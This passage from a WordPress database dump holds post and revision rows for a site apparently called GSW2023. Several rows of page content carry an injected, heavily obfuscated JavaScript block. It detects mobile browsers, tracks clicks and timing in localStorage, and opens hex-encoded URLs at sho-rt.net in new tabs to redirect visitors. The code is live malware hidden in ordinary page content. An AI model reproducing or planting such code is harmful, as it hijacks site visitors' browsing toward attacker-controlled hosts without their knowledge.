)|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','publish','closed','closed','','home_n','','','2023-09-16 14:38:10','2023-09-16 14:38:10','',0,'https://gsw2023.com/?page_id=3066',40,'page','',0),
(3067,1,'2022-11-08 21:29:11','2022-11-08 21:29:11','<p>[vc_row][vc_column][dt_portfolio_masonry mode=\"grid\" content_alignment=\"center\" custom_content_bg_color=\"#f7f7f7\" post_content_paddings=\"20px 30px 30px 30px\" resized_image_dimensions=\"3x2\" image_border_radius=\"0px\" image_paddings=\"20px 20px 0px 20px\" post_title_font_size=\"22px\" post_title_line_height=\"32px\" post_date=\"n\" post_author=\"n\" post_comments=\"n\" post_content=\"off\" read_more_button=\"default_button\" read_more_button_text=\"Details\" project_icon_border_width=\"0px\" project_icon_color=\"#ffffff\" project_icon_color_hover=\"#ffffff\" loading_mode=\"js_more\" jsm_posts_per_page=\"6\" show_categories_filter=\"y\" category=\"\"][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Home_n','','inherit','closed','closed','','3066-revision-v1','','','2022-11-08 21:29:11','2022-11-08 21:29:11','',3066,'https://gsw2023.com/?p=3067',0,'revision','',0),
(3068,1,'2022-11-08 21:31:59','2022-11-08 21:31:59','','Egyptian Pyramids In Sand Desert And Clear Sky','Egyptian pyramids in sand desert and clear sky','inherit','open','closed','','egyptian-pyramids-in-sand-desert-and-clear-sky','','','2022-11-08 21:31:59','2022-11-08 21:31:59','',3066,'https://gsw2023.com/wp-content/uploads/2022/11/egyptian-pyramids.jpg',0,'attachment','image/jpeg',0),
(3070,1,'2022-11-08 21:34:34','2022-11-08 21:34:34','[vc_row][vc_column][dt_portfolio_masonry mode=\"grid\" content_alignment=\"center\" custom_content_bg_color=\"#f7f7f7\" post_content_paddings=\"20px 30px 30px 30px\" resized_image_dimensions=\"3x2\" image_border_radius=\"0px\" image_paddings=\"20px 20px 0px 20px\" post_title_font_size=\"22px\" post_title_line_height=\"32px\" post_date=\"n\" post_author=\"n\" post_comments=\"n\" post_content=\"off\" read_more_button=\"default_button\" read_more_button_text=\"Details\" project_icon_border_width=\"0px\" project_icon_color=\"#ffffff\" project_icon_color_hover=\"#ffffff\" loading_mode=\"js_more\" jsm_posts_per_page=\"6\" show_categories_filter=\"y\" category=\"\"][/vc_column][/vc_row]\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return 